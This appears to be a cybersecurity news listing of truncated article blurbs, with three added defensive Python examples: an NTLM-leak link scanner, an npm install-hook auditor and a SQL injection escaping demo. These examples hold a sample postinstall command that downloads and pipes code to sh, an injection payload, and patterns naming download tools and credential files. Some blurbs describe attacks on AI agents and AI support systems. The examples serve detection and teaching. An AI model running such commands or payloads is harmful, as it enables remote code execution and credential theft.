Category: Cybersecurity

Latest Arabian cybersecurity news covering global cyber threats, ransomware attacks, data breaches, digital espionage, and technology security developments affecting governments, companies and individuals.


Malicious agent-skill uploads have slipped past detection tools used by ClawHub, Cisco and Vercel-linked scanning services, raising fresh concern over the security of fast-growing marketplaces that distribute third-party capabilities for AI agents. The findings point to a widening supply-chain problem around “skills”, the modular instruction-and-file packages that allow AI agents to perform tasks such as editing documents, running scripts, managing workflows or connecting with external services. Unlike conventional software packages, these skills may combine code, natural-language instructions, metadata and bundled files,

Cybercriminal groups are shifting phishing campaigns from fake login pages to malware-led intrusions that silently extract passwords, browser cookies, session tokens, cryptocurrency wallet data and other sensitive information from infected devices. The change marks a significant turn in online fraud tactics. Classic phishing pages still imitate banks, cloud services, delivery firms and workplace platforms, but attackers are increasingly using emails, search ads, fake software installers, messaging apps and compromised websites to deliver infostealer malware. Once installed, these tools can collect far

Cyber espionage operators are using a newly documented Windows backdoor called HazyBeacon to target government networks in Southeast Asia, turning legitimate Amazon Web Services infrastructure into a covert command-and-control channel that can blend into ordinary cloud traffic. The activity, tracked as CL-STA-1020, has been linked to intelligence-gathering operations focused on sensitive state information, including material tied to tariffs, trade disputes and government policy discussions. Security researchers have identified the campaign as part of a wider movement by advanced threat actors away

Security researchers have warned that a Windows Search URI handler weakness can leak NTLMv2 hashes to remote attackers through a crafted link, reviving concerns over long-running authentication risks in enterprise networks. The issue affects the search: handler used by Windows Explorer to process desktop search requests. A malicious link can direct the handler towards an attacker-controlled network path, causing the victim’s system to attempt authentication over SMB and transmit a Net-NTLMv2 hash before an error message appears. The attack requires user
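Added example (editor's illustration, not code from the article, from Microsoft or from the researchers cited): a small Python scanner that pulls search-style URIs out of mail or web content and flags any whose location crumb points at a remote host, which is the condition under which Explorer would try SMB authentication and send the Net-NTLMv2 hash. The regex, the crumb=location: syntax shared by search: and search-ms:, and the sample HTML are this example's own assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Desktop-search URI schemes handed to Explorer's search handler.
# Assumption for this example: the page's "search:" handler and the related
# "search-ms:" scheme both accept a crumb=location:<path> parameter.
SEARCH_SCHEMES = ("search", "search-ms")

# Matches a UNC path (\\host\share...) and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\\s]+)")

# Pulls candidate search URIs out of HTML or plain text (constructed regex).
URI_RE = re.compile(r"(?i)\b(?:search-ms|search):[^\s\"'<>]+")


def remote_host_in_location(value: str) -> Optional[str]:
    """Return the remote host a location: crumb would make SMB contact, else None."""
    v = unquote(value).strip()
    m = UNC_RE.match(v)
    if m:
        return m.group(1)
    if v.lower().startswith("file:"):
        host = urlsplit(v).hostname
        if host and host.lower() not in ("localhost", "127.0.0.1", "::1"):
            return host
    return None


def is_suspicious_search_uri(uri: str) -> Tuple[bool, str]:
    """Classify a single search/search-ms URI: (suspicious, reason)."""
    scheme, sep, rest = uri.strip().partition(":")
    if not sep or scheme.lower() not in SEARCH_SCHEMES:
        return False, "not a search URI"
    params = parse_qs(rest, keep_blank_values=True)
    for crumb in params.get("crumb", []):
        kind, _, location = crumb.partition(":")
        if kind.strip().lower() != "location":
            continue
        host = remote_host_in_location(location)
        if host:
            return True, f"search scoped to remote location on host {host}"
    return False, "no remote location crumb"


def scan_for_ntlm_leak_links(text: str) -> List[Tuple[str, str]]:
    """Return (uri, reason) for every search URI in text that points off-host."""
    findings = []
    for m in URI_RE.finditer(text):
        suspicious, reason = is_suspicious_search_uri(m.group(0))
        if suspicious:
            findings.append((m.group(0), reason))
    return findings


# Constructed sample: one link scoped to an attacker-style host, one local, one web URL.
SAMPLE_HTML = (
    '<a href="search-ms:query=invoice&crumb=location:\\\\203.0.113.10\\docs&displayname=Invoices">Open</a>'
    '<a href="search:query=report&crumb=location:C:\\Users\\Public">Local</a>'
    '<a href="https://example.test/?q=search:foo">Web</a>'
)

if __name__ == "__main__":
    for uri, reason in scan_for_ntlm_leak_links(SAMPLE_HTML):
        print(f"BLOCK {uri!r}: {reason}")
```

The local-path link is deliberately left alone: the hash only leaves the machine when the location resolves to another host, so a filter that blocks every search: link would mostly generate noise. Outbound SMB (TCP 445) egress filtering remains the control that stops the hash reaching the attacker even when a link is clicked.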

Attackers have compromised Red Hat’s official @redhat-cloud-services namespace on npm, inserting credential-stealing malware into dozens of package releases used in cloud console development and software build pipelines. The breach, identified on 1 June 2026, affected at least 32 package releases across the Red Hat Cloud Services ecosystem, including frontend components, generated API clients and supporting developer tooling linked to the Red Hat Hybrid Cloud Console. The malicious versions were designed to execute automatically during installation, giving the attackers a route into
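Added example (editor's illustration, not code from the article or from Red Hat): code that "executes automatically during installation" on npm means a lifecycle script such as preinstall, install, postinstall or prepare in package.json. The Python audit below lists every such hook in a set of manifests and annotates the ones that download, evaluate inline code, decode blobs or read credential files. The risky-pattern list and the sample manifests are constructed for this example.

```python
import json
import os
import re
from typing import Dict, Iterable, List, Tuple

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments unusual in a legitimate install step and common in credential
# stealers (illustrative list, not exhaustive).
RISKY_PATTERNS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "downloads at install time"),
    (re.compile(r"\bnode\s+-e\b|\beval\(", re.I), "evaluates inline code"),
    (re.compile(r"base64|atob\(", re.I), "decodes an encoded blob"),
    (re.compile(r"~/\.(npmrc|aws|ssh|config/gcloud)|process\.env", re.I),
     "reads credential files or environment"),
]


def audit_manifest(name: str, manifest: Dict) -> List[Tuple[str, str, str]]:
    """Return (package, hook, note) for every install-time hook in one package.json."""
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = (manifest.get("scripts") or {}).get(hook)
        if not cmd:
            continue
        notes = [msg for rx, msg in RISKY_PATTERNS if rx.search(cmd)]
        findings.append((name, hook, "; ".join(notes) or "runs code at install (review)"))
    return findings


def audit_manifests(items: Iterable[Tuple[str, Dict]]) -> List[Tuple[str, str, str]]:
    """Audit an iterable of (package name, parsed package.json) pairs."""
    out = []
    for name, manifest in items:
        out.extend(audit_manifest(name, manifest))
    return out


def audit_node_modules(root: str) -> List[Tuple[str, str, str]]:
    """Walk an installed node_modules tree and audit every package.json found."""
    items = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except ValueError:
                continue  # not a manifest we can parse; skip rather than crash
        items.append((manifest.get("name") or os.path.relpath(dirpath, root), manifest))
    return audit_manifests(items)


# Constructed sample manifests (hypothetical names, not real package contents).
SAMPLE_MANIFESTS = [
    ("@example-scope/frontend-components", {"scripts": {
        "build": "tsc", "test": "jest",
        "postinstall": "node -e \"require('child_process').exec('curl -s https://203.0.113.5/x | sh')\"",
    }}),
    ("@example-scope/api-client", {"scripts": {"build": "tsc", "prepare": "npm run build"}}),
    ("left-pad-ish", {"scripts": {"test": "node test.js"}}),
]

if __name__ == "__main__":
    for pkg, hook, note in audit_manifests(SAMPLE_MANIFESTS):
        print(f"{pkg}: {hook}: {note}")
```

In CI the simplest hardening is to install with `npm ci --ignore-scripts` (or `ignore-scripts=true` in .npmrc) and run only the build steps you have reviewed, so a poisoned release cannot execute merely by being resolved.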

A threat actor has used artificial intelligence coding tools to build and refine malware intended to bypass endpoint detection and response systems, highlighting how generative AI is being folded into practical cyberattack development rather than remaining a theoretical risk. The activity was presented as a red team project, but the discovered framework pointed to stealthy post-exploitation operations, including ransomware deployment and data theft. The case shows how attackers are adapting tools used by legitimate developers and security testers to accelerate malware

Anthropic is expanding access to Claude Mythos Preview through Project Glasswing, widening a controlled cybersecurity programme at a time when North Korean-linked hackers are sharpening attacks against macOS users in the financial, venture capital, Web3 and cryptocurrency sectors. The San Francisco-based AI company plans to increase the number of Project Glasswing partners from about 50 to roughly 200 organisations across more than 15 countries, broadening access to a model designed to identify and help fix serious software vulnerabilities. The expansion comes

Hackers have used 34 malicious open-source packages across npm, PyPI and Crates.io to steal cloud credentials, crypto wallet data, SSH keys and developer secrets, exposing a widening security gap in software supply chains used by blockchain, artificial intelligence and cloud engineering teams. The campaign, tracked as TrapDoor, spans more than 384 package versions and artefacts. It targets developers working in cryptocurrency, DeFi, Solana, Sui, Move, AI tooling and cloud environments, where a single workstation can hold access to source code,

A critical weakness in Flowise has exposed self-hosted AI workflow servers to full compromise, after technical details and working exploit code showed that a logged-in user could trigger command execution by importing a crafted chatflow. The flaw, tracked as CVE-2026-40933, affects Flowise deployments before version 3.1.0 and carries a 9.9 severity score. It stems from the way Flowise handles Model Context Protocol, or MCP, configurations in its Custom MCP tool. A malicious configuration can abuse the stdio transport to cause the

Palo Alto Networks customers are facing renewed pressure to patch internet-facing security systems after attackers began exploiting a high-severity authentication bypass flaw in PAN-OS GlobalProtect, a product widely used to provide remote access to corporate networks. The vulnerability, tracked as CVE-2026-0257, affects GlobalProtect portal and gateway deployments in PAN-OS where authentication override cookies are enabled alongside a specific certificate configuration. Successful exploitation can allow a remote attacker without valid credentials to bypass security restrictions and establish an unauthorised VPN connection, potentially

Hackers are using targeted spearphishing emails to deploy AZUREVEIL, an Adaptix-based command-and-control agent, against government and enterprise-linked targets in the Czech Republic and Taiwan, underscoring the growing use of trusted cloud services to mask cyber-espionage activity. The campaign, tracked as Operation Dragon Weave, begins with a malicious ZIP archive carrying files designed to appear as official documents. Once opened, the archive can trigger a multi-stage infection chain that uses deceptive file names, script execution, DLL sideloading and a Rust-based loader before

SolyxImmortal, a Python-based information-stealing malware, is drawing attention from cyber defenders because of its ability to combine browser credential theft, document harvesting, keystroke logging and screen surveillance inside a single Windows implant. Technical analysis shows the malware is designed to operate quietly on compromised machines, using common Python libraries, Windows features and multi-threaded execution to run several data-collection functions at the same time. Its targets include saved browser passwords, cookies, text files, PDFs, Word documents, Excel files, screenshots and keyboard input,

Cybercriminals are exploiting trust in artificial intelligence platforms by abusing shared ChatGPT and Claude content links to steer users towards malware disguised as legitimate OpenAI software. The campaign, tracked by security researchers as LLMShare, uses malicious search advertisements and search-engine manipulation to lure victims to pages that appear to be hosted on trusted AI domains. Once users click through, they are shown a fully designed web page carrying ChatGPT-style branding, including fake outage notices and prompts to download a supposed ChatGPT

A destructive cyber campaign tied to Iran-linked operators has targeted organisations in the Middle East and abroad, deleting virtual machines, databases, partitions and backup repositories in attacks designed to cripple recovery as well as disrupt daily operations. The activity has been linked by forensic investigators to infrastructure and tactics associated with Black Shadow, a long-running threat group assessed by Israeli authorities and private researchers as operating on behalf of Iran’s Ministry of Intelligence and Security. The operation marks a shift from

Instagram is under renewed pressure over claims that a weakness in Meta’s AI-assisted support and account recovery systems could allow attackers to manipulate password reset flows and target high-value accounts. The allegation centres on an AI-powered help feature intended to guide users through account recovery, settings changes and login problems. Security researchers say the system could allegedly be prompted in ways that allowed unauthorised parties to trigger or redirect password reset actions without adequate identity checks. Meta has not publicly confirmed

Hackers are using fake Signal support messages to trick users into handing over backup recovery keys, opening a new front in attacks against one of the world’s most trusted encrypted messaging platforms. The campaign centres on messages sent inside Signal from accounts posing as “Signal Support”. Targets are warned that their backed-up chats and media face permanent loss because of a supposed sync problem. They are then urged to paste their backup recovery key into the chat to “relink” their archive.

A malicious NuGet package posing as a Sicoob software development kit has exposed sensitive banking authentication data, intensifying concerns over attacks that exploit trust in open-source developer ecosystems. The package, published as Sicoob.Sdk, was presented as a C# SDK for integrations with Sicoob, one of Brazil’s largest cooperative financial systems. Versions 2.0.0 to 2.0.4 were found to collect client IDs, PFX passwords and base64-encoded PFX certificate archives when developers used the package to configure banking API connections. The package first

Trusted software development tools have become a prime attack channel as adversaries target the systems that programmers use to build, test and deploy code, exposing companies to stolen credentials, leaked source code and compromised software pipelines. The warning has sharpened after multiple campaigns hit developer ecosystems during May, including a poisoned Visual Studio Code extension linked to Nx Console and a large-scale GitHub Actions operation known as Megalodon. Together, the incidents show how attackers are moving beyond conventional phishing and malware

Russia-linked cyber operators tracked as GREYVIBE have used generative artificial intelligence tools including ChatGPT and Google Gemini to widen cyber-espionage operations against Ukraine-linked targets, signalling a shift in how lower-skilled threat groups can build lures, malware and infrastructure at speed. The activity, active since at least August 2025, has targeted military, government, civilian and business-related organisations through phishing emails, fake verification pages, fraudulent websites and custom malware. The operators are assessed to be Russian-speaking, working largely within Moscow time, and focused

Google has made Device Bound Session Credentials generally available in Chrome for Windows, widening access to a security feature designed to blunt one of the most common routes into compromised online accounts: stolen session cookies. The move gives Chrome users and organisations a stronger layer of protection after login, where many account takeovers now occur even when passwords and multi-factor authentication have already been passed. DBSC links a user’s authenticated web session to the device on which it was created, making

Cybersecurity teams are racing to patch a Palo Alto Networks authentication-bypass flaw after confirmed exploitation against exposed GlobalProtect deployments raised the risk profile of a vulnerability first disclosed this month. Tracked as CVE-2026-0257, the flaw affects PAN-OS firewalls and Prisma Access environments where GlobalProtect portal or gateway services are configured with authentication override cookies and a vulnerable certificate setup. Successful exploitation allows an unauthenticated remote attacker to bypass normal VPN authentication controls and establish an unauthorised GlobalProtect connection, creating a path

China-linked hacking groups have used the Middle East war to intensify cyber-espionage attempts against maritime, energy and political targets across the Gulf, exposing how regional conflict is being turned into an intelligence-gathering opportunity for rival powers. The activity, tracked between October 2025 and March 2026, shows threat actors aligned with Beijing moving quickly around geopolitical shocks, particularly after the escalation involving Iran from late February. Maritime affairs, oil flows, energy infrastructure, government networks and strategic technologies have emerged as priority targets,

Cybercriminals are shifting from crude misspellings of trusted software packages to more convincing names that appear to belong inside legitimate developer ecosystems, raising fresh concern across open-source security teams and enterprise software supply chains. The change marks a significant evolution in package impersonation attacks. Rather than relying only on a developer mistyping a package name, malicious publishers are creating packages that look like natural extensions, plugins, configuration tools, SDKs, wrappers or versioned variants of widely used projects. The tactic exploits the

Hackers are using illegal streaming and digital library websites to spread cryptocurrency miners and remote access malware through fake video player updates, exposing millions of visitors to stealthy infections that can drain computing power and give attackers remote control over compromised systems. The campaign targets users who attempt to watch pirated films or television shows. Instead of loading the video, the website displays a warning that a video player plugin is outdated and must be updated before playback can continue. Users

Carnival Corporation has begun notifying nearly 6 million people after a cyber intrusion exposed personal information, intensifying scrutiny of data protection practices at one of the world’s largest cruise operators. The Miami-based company said unauthorised activity was detected on April 14 after an attacker used social engineering to deceive an employee and gain access to a limited part of its IT environment. Regulatory filings show 5,995,277 people were affected, including 9,746 residents of Maine, where the incident was formally reported to

Cryptocurrency developers have become the focus of a new macOS-focused cyber campaign that uses fake recruiter approaches, malicious meeting links and compromised software pipelines to steal digital assets and spread malware through trusted internal systems. The activity is being tracked as JINX-0164, a previously unreported financially motivated threat actor active since at least mid-2025. Investigators found that the group has targeted cryptocurrency organisations by approaching developers and employees through credible LinkedIn profiles, then steering them towards bogus online meeting platforms or

Hackers are using GHOSTYNETWORKS and OMEGATECH to sustain a global JavaScript malware operation that has targeted organisations across energy, finance, retail, automotive and government-linked sectors, underlining the expanding role of bulletproof hosting in large-scale email fraud. The campaign, tracked across March 2026 activity, used malicious ZIP and RAR attachments to deliver an obfuscated JavaScript backdoor through malspam waves sent to victims in multiple regions. Targets included energy companies, finance ministries and commercial groups, with evidence pointing to financially motivated activity designed

Motorola has disabled a phone software behaviour that routed some Amazon Shopping app launches through web tracking links before opening the app, after users and technology researchers found affiliate referral codes being inserted into shopping sessions without clear notice. The issue centred on Motorola’s preinstalled Smart Feed and Moto App Launcher experience, which appeared to intercept launches of Amazon from the app drawer on certain devices. Instead of opening Amazon directly, affected phones briefly opened a browser, passed through a tracking

Cybercriminals behind the ClearFake campaign have shifted deeper into blockchain-based command infrastructure, using BNB Smart Chain testnet contracts to deliver malicious code and frustrate conventional takedown efforts. The campaign marks an escalation in the abuse of decentralised infrastructure for malware operations. Instead of relying on domains, hosting providers or disposable servers that can be suspended, the operators are storing payload logic and routing instructions inside smart contracts on a public blockchain test network. Once written to the chain, the data is

Roundcube Webmail administrators are being pressed to install emergency updates after maintainers fixed a set of security flaws that could expose email systems to database manipulation, script injection, server-side request forgery and other attacks. Versions 1.6.16 and 1.7.1, released on 24 May 2026, address vulnerabilities affecting the 1.6 long-term support line and the 1.7 branch. The most closely watched issue is a pre-authentication SQL injection flaw in the virtuserquery plugin, where a backslash escape bypass in preg_replace could allow attackers to
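Added example (editor's illustration of the bug class, not Roundcube's actual code and not a reproduction of the flaw above): a "backslash escape bypass" arises when a string-quoting routine escapes the quote character but not the backslash, so an input beginning with a backslash neutralises the escape that follows it and the quoted literal closes early. The Python below models a MySQL-style literal scanner (backslash escapes the next character; a doubled quote is a literal quote, which is the dialect assumed here), shows the naive and corrected escapers side by side, and finishes with a bound parameter, which is the fix that removes quoting from application code altogether. The query, table and payload are constructed for the example.

```python
import sqlite3
from typing import Callable


def naive_escape(value: str) -> str:
    """The bug class: escapes only the quote, leaving backslashes untouched."""
    return value.replace("'", "\\'")


def proper_escape(value: str) -> str:
    """Escape the escape character first, then the quote (backslash-escaping dialect)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query(username: str, escape: Callable[[str], str]) -> str:
    """String-built query of the kind an escaping routine is meant to protect."""
    return f"SELECT email FROM users WHERE username = '{escape(username)}'"


def text_after_first_literal(sql: str) -> str:
    """Scan like a MySQL-style parser and return whatever follows the closing quote
    of the first single-quoted literal ('' if the literal runs to the end)."""
    start = sql.find("'")
    if start < 0:
        return ""
    i = start + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\":          # backslash escapes the next character
            i += 2
            continue
        if ch == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":   # '' is a literal quote
                i += 2
                continue
            return sql[i + 1:]  # literal closed here
        i += 1
    return ""


def injection_breaks_out(username: str, escape: Callable[[str], str]) -> bool:
    """True if the attacker-controlled value escapes the quoted literal."""
    return text_after_first_literal(build_query(username, escape)).strip() != ""


def parameterized_lookup(username: str) -> int:
    """The real fix: bind the value and let the driver handle quoting. Uses an
    in-memory SQLite table constructed for the example; returns matching row count."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    rows = conn.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchall()
    conn.close()
    return len(rows)


# Constructed payload: a backslash, then a quote, then a tautology and a comment.
PAYLOAD = "\\' OR 1=1 -- "

if __name__ == "__main__":
    for label, esc in (("naive", naive_escape), ("proper", proper_escape)):
        print(label, build_query(PAYLOAD, esc), "->", injection_breaks_out(PAYLOAD, esc))
    print("parameterized rows for payload:", parameterized_lookup(PAYLOAD))
```

With the naive escaper the payload becomes `\\' OR 1=1 -- `: the parser reads `\\` as one escaped backslash, the following quote closes the literal, and the rest of the input is executed as SQL. Escaping the backslash first keeps the quote inside the literal; binding the value as a parameter avoids the question entirely.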

Cybercriminals are exploiting mounting demand for the 2026 FIFA World Cup by creating spoofed FIFA-themed websites designed to steal personal details, payment data and money from fans seeking tickets, hospitality packages, jobs and tournament information. The warning, issued by the Federal Bureau of Investigation on May 27, 2026, places FIFA impersonation scams among the key online threats facing supporters before and during the tournament across the United States, Canada and Mexico. The campaign relies on lookalike domains, altered web addresses and

InMotion Hosting said it contained a critical cPanel and WHM authentication-bypass flaw that threatened one of the web-hosting industry’s most widely used management platforms, after blocking exposure across its network and patching affected systems. The vulnerability, tracked as CVE-2026-41940, created a high-impact route for unauthenticated attackers to gain access to cPanel and WebHost Manager interfaces. The issue drew urgent attention because cPanel is used by hosting providers, resellers and site administrators to manage domains, files, email, databases, security certificates and server-level

Cybersecurity researchers have warned that BTMOB, an Android remote access trojan, has developed into a potent tool for criminals seeking to hijack smartphones, steal data and run fraud from compromised devices. The malware, first identified in early 2025, has moved beyond the narrower behaviour associated with many banking trojans. It can capture screens, record activity, manage files, intercept credentials, control device functions and give an attacker near-live access to a victim’s handset. Its evolution is drawing close attention because it combines

State Bank of India has warned customers against a phishing campaign that falsely claims its YONO app will be deactivated unless Aadhaar details are updated through a shared link or APK file. The country’s largest lender has said the messages are fraudulent and should be ignored. Customers have been advised not to download files received through SMS, WhatsApp, email or social media, and not to share account details, Aadhaar numbers, passwords, PINs or one-time passwords with anyone. The warning follows the
